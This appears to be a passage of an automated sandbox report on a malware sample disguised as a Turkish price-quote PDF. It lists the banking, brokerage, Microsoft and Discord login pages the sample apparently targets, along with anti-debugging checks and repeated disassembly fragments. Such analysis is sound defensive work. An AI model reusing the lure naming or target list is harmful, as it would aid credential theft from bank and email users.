            Source: 7454168B.9.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: 7454168B.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: 7454168B.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: 7454168B.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 7454168B.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: 7454168B.9.drBinary or memory string: discord.comVMware20,11696497155f
            Source: 7454168B.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: 7454168B.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 7454168B.9.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 7454168B.9.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: 7454168B.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: 7454168B.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: 7454168B.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B1096E rdtsc 7_2_01B1096E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00417893 LdrLoadDll,7_2_00417893
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5019F mov eax, dword ptr fs:[00000030h]7_2_01B5019F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5019F mov eax, dword ptr fs:[00000030h]7_2_01B5019F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5019F mov eax, dword ptr fs:[00000030h]7_2_01B5019F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5019F mov eax, dword ptr fs:[00000030h]7_2_01B5019F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8C188 mov eax, dword ptr fs:[00000030h]7_2_01B8C188
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8C188 mov eax, dword ptr fs:[00000030h]7_2_01B8C188
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B10185 mov eax, dword ptr fs:[00000030h]7_2_01B10185
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B74180 mov eax, dword ptr fs:[00000030h]7_2_01B74180
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B74180 mov eax, dword ptr fs:[00000030h]7_2_01B74180
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACA197 mov eax, dword ptr fs:[00000030h]7_2_01ACA197
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACA197 mov eax, dword ptr fs:[00000030h]7_2_01ACA197
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACA197 mov eax, dword ptr fs:[00000030h]7_2_01ACA197
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B001F8 mov eax, dword ptr fs:[00000030h]7_2_01B001F8
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA61E5 mov eax, dword ptr fs:[00000030h]7_2_01BA61E5
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E1D0 mov eax, dword ptr fs:[00000030h]7_2_01B4E1D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E1D0 mov eax, dword ptr fs:[00000030h]7_2_01B4E1D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E1D0 mov ecx, dword ptr fs:[00000030h]7_2_01B4E1D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E1D0 mov eax, dword ptr fs:[00000030h]7_2_01B4E1D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E1D0 mov eax, dword ptr fs:[00000030h]7_2_01B4E1D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B961C3 mov eax, dword ptr fs:[00000030h]7_2_01B961C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B961C3 mov eax, dword ptr fs:[00000030h]7_2_01B961C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B00124 mov eax, dword ptr fs:[00000030h]7_2_01B00124
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B90115 mov eax, dword ptr fs:[00000030h]7_2_01B90115
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7A118 mov ecx, dword ptr fs:[00000030h]7_2_01B7A118
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7A118 mov eax, dword ptr fs:[00000030h]7_2_01B7A118
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7A118 mov eax, dword ptr fs:[00000030h]7_2_01B7A118
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7A118 mov eax, dword ptr fs:[00000030h]7_2_01B7A118
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov ecx, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov ecx, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov ecx, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E10E mov ecx, dword ptr fs:[00000030h]7_2_01B7E10E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4164 mov eax, dword ptr fs:[00000030h]7_2_01BA4164
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4164 mov eax, dword ptr fs:[00000030h]7_2_01BA4164
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B68158 mov eax, dword ptr fs:[00000030h]7_2_01B68158
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B64144 mov eax, dword ptr fs:[00000030h]7_2_01B64144
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B64144 mov eax, dword ptr fs:[00000030h]7_2_01B64144
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B64144 mov ecx, dword ptr fs:[00000030h]7_2_01B64144
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B64144 mov eax, dword ptr fs:[00000030h]7_2_01B64144
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B64144 mov eax, dword ptr fs:[00000030h]7_2_01B64144
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD6154 mov eax, dword ptr fs:[00000030h]7_2_01AD6154
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD6154 mov eax, dword ptr fs:[00000030h]7_2_01AD6154
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACC156 mov eax, dword ptr fs:[00000030h]7_2_01ACC156
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B960B8 mov eax, dword ptr fs:[00000030h]7_2_01B960B8
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B960B8 mov ecx, dword ptr fs:[00000030h]7_2_01B960B8
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC80A0 mov eax, dword ptr fs:[00000030h]7_2_01AC80A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B680A8 mov eax, dword ptr fs:[00000030h]7_2_01B680A8
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD208A mov eax, dword ptr fs:[00000030h]7_2_01AD208A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B120F0 mov ecx, dword ptr fs:[00000030h]7_2_01B120F0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD80E9 mov eax, dword ptr fs:[00000030h]7_2_01AD80E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACA0E3 mov ecx, dword ptr fs:[00000030h]7_2_01ACA0E3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B560E0 mov eax, dword ptr fs:[00000030h]7_2_01B560E0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACC0F0 mov eax, dword ptr fs:[00000030h]7_2_01ACC0F0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B520DE mov eax, dword ptr fs:[00000030h]7_2_01B520DE
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B66030 mov eax, dword ptr fs:[00000030h]7_2_01B66030
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACA020 mov eax, dword ptr fs:[00000030h]7_2_01ACA020
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACC020 mov eax, dword ptr fs:[00000030h]7_2_01ACC020
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B54000 mov ecx, dword ptr fs:[00000030h]7_2_01B54000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h]7_2_01B72000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h]7_2_01B72000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h]7_2_01B72000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h]7_2_01B72000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h]7_2_01B72000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h]7_2_01B72000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h]7_2_01B72000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h]7_2_01B72000
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE016 mov eax, dword ptr fs:[00000030h]7_2_01AEE016
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE016 mov eax, dword ptr fs:[00000030h]7_2_01AEE016
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE016 mov eax, dword ptr fs:[00000030h]7_2_01AEE016
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE016 mov eax, dword ptr fs:[00000030h]7_2_01AEE016
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFC073 mov eax, dword ptr fs:[00000030h]7_2_01AFC073
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56050 mov eax, dword ptr fs:[00000030h]7_2_01B56050
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD2050 mov eax, dword ptr fs:[00000030h]7_2_01AD2050
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF438F mov eax, dword ptr fs:[00000030h]7_2_01AF438F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF438F mov eax, dword ptr fs:[00000030h]7_2_01AF438F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACE388 mov eax, dword ptr fs:[00000030h]7_2_01ACE388
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACE388 mov eax, dword ptr fs:[00000030h]7_2_01ACE388
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACE388 mov eax, dword ptr fs:[00000030h]7_2_01ACE388
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC8397 mov eax, dword ptr fs:[00000030h]7_2_01AC8397
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC8397 mov eax, dword ptr fs:[00000030h]7_2_01AC8397
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC8397 mov eax, dword ptr fs:[00000030h]7_2_01AC8397
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE03E9 mov eax, dword ptr fs:[00000030h]7_2_01AE03E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE03E9 mov eax, dword ptr fs:[00000030h]7_2_01AE03E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE03E9 mov eax, dword ptr fs:[00000030h]7_2_01AE03E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE03E9 mov eax, dword ptr fs:[00000030h]7_2_01AE03E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE03E9 mov eax, dword ptr fs:[00000030h]7_2_01AE03E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE03E9 mov eax, dword ptr fs:[00000030h]7_2_01AE03E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE03E9 mov eax, dword ptr fs:[00000030h]7_2_01AE03E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE03E9 mov eax, dword ptr fs:[00000030h]7_2_01AE03E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B063FF mov eax, dword ptr fs:[00000030h]7_2_01B063FF
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE3F0 mov eax, dword ptr fs:[00000030h]7_2_01AEE3F0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE3F0 mov eax, dword ptr fs:[00000030h]7_2_01AEE3F0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE3F0 mov eax, dword ptr fs:[00000030h]7_2_01AEE3F0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B743D4 mov eax, dword ptr fs:[00000030h]7_2_01B743D4
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B743D4 mov eax, dword ptr fs:[00000030h]7_2_01B743D4
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E3DB mov eax, dword ptr fs:[00000030h]7_2_01B7E3DB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E3DB mov eax, dword ptr fs:[00000030h]7_2_01B7E3DB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E3DB mov ecx, dword ptr fs:[00000030h]7_2_01B7E3DB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7E3DB mov eax, dword ptr fs:[00000030h]7_2_01B7E3DB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA3C0 mov eax, dword ptr fs:[00000030h]7_2_01ADA3C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA3C0 mov eax, dword ptr fs:[00000030h]7_2_01ADA3C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA3C0 mov eax, dword ptr fs:[00000030h]7_2_01ADA3C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA3C0 mov eax, dword ptr fs:[00000030h]7_2_01ADA3C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA3C0 mov eax, dword ptr fs:[00000030h]7_2_01ADA3C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA3C0 mov eax, dword ptr fs:[00000030h]7_2_01ADA3C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD83C0 mov eax, dword ptr fs:[00000030h]7_2_01AD83C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD83C0 mov eax, dword ptr fs:[00000030h]7_2_01AD83C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD83C0 mov eax, dword ptr fs:[00000030h]7_2_01AD83C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD83C0 mov eax, dword ptr fs:[00000030h]7_2_01AD83C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8C3CD mov eax, dword ptr fs:[00000030h]7_2_01B8C3CD
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B563C0 mov eax, dword ptr fs:[00000030h]7_2_01B563C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA8324 mov eax, dword ptr fs:[00000030h]7_2_01BA8324
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA8324 mov ecx, dword ptr fs:[00000030h]7_2_01BA8324
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA8324 mov eax, dword ptr fs:[00000030h]7_2_01BA8324
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA8324 mov eax, dword ptr fs:[00000030h]7_2_01BA8324
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A30B mov eax, dword ptr fs:[00000030h]7_2_01B0A30B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A30B mov eax, dword ptr fs:[00000030h]7_2_01B0A30B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A30B mov eax, dword ptr fs:[00000030h]7_2_01B0A30B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACC310 mov ecx, dword ptr fs:[00000030h]7_2_01ACC310
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF0310 mov ecx, dword ptr fs:[00000030h]7_2_01AF0310
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7437C mov eax, dword ptr fs:[00000030h]7_2_01B7437C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B78350 mov ecx, dword ptr fs:[00000030h]7_2_01B78350
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5035C mov eax, dword ptr fs:[00000030h]7_2_01B5035C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5035C mov eax, dword ptr fs:[00000030h]7_2_01B5035C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5035C mov eax, dword ptr fs:[00000030h]7_2_01B5035C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5035C mov ecx, dword ptr fs:[00000030h]7_2_01B5035C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5035C mov eax, dword ptr fs:[00000030h]7_2_01B5035C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5035C mov eax, dword ptr fs:[00000030h]7_2_01B5035C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9A352 mov eax, dword ptr fs:[00000030h]7_2_01B9A352
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA634F mov eax, dword ptr fs:[00000030h]7_2_01BA634F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
